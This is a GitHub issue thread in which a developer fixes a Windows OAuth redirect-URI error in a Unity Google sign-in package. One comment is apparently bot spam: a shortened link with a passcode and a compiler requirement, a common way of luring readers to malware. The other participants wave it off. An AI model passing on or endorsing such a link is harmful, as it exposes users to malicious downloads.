### ISSUE TITLE
Windows Login Issue

### ISSUE THREAD

**Issue by divieirasilva** [hippogamesunity/SimpleSignIn#23]
In Editor is working fine, I already checked the Client ID and Client Secret in both
This issue seems to started after updating to 4.6 of Google Simple Signin

<img width="1117" alt="image" src="https://github.com/user-attachments/assets/4a6e0206-97f2-4933-aba1-93346ee10842">

**Comment by hippogamesunity** [comment]
Hello! As it says, you redirect URI does not match to the one specified for your client ID. Visit Google Cloud to check it.

**Comment by divieirasilva** [comment]
Hello, thank you for answering me, I have a production version with old Package in Steam and that version is still working fine, only the updated package version is not working. Also, where can I set the redurect URI in desktop credential? I followed this screenshot in docs. (sorry if I am making any silly mistake, english is not my primary language 🙏🏻)

![image](https://github.com/user-attachments/assets/f1ea6f2d-3b1f-4f8d-98aa-517217ddbbab)

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by hippogamesunity** [comment]
What is your platform and what is the full URL you're navigating? I don't know about any compilers, sorry.

**Comment by divieirasilva** [comment]
That compilers message, I think was a bot. That is not part of my issue. 

I am using Windows 11 (64bit) and only there the problem is showing, in Editor is working fine (with the same Client ID set).

**The URL (I cropped my ClientID):**
https://accounts.google.com/o/oauth2/v2/auth?response_type=code&scope=openid%20email%20profile&redirect_uri=soul.shifters%3A%2Foauth2%2Fgoogle&client_id=1021323784810-qe......

**Comment by divieirasilva** [comment]
I found the problem, I set the Desktop Client ID and Secret in the Windows config. Now I copy the config from Generic into the Windows fields and it is working again. I probably made that mistake when I updated the package and the GoogleAuthSettings reset from Import Package. 

But it's working now. Thank you for the assistance and sorry for the trouble 🙏🏻

**Comment by hippogamesunity** [comment]
Great, please write a review if possible. Good luck!
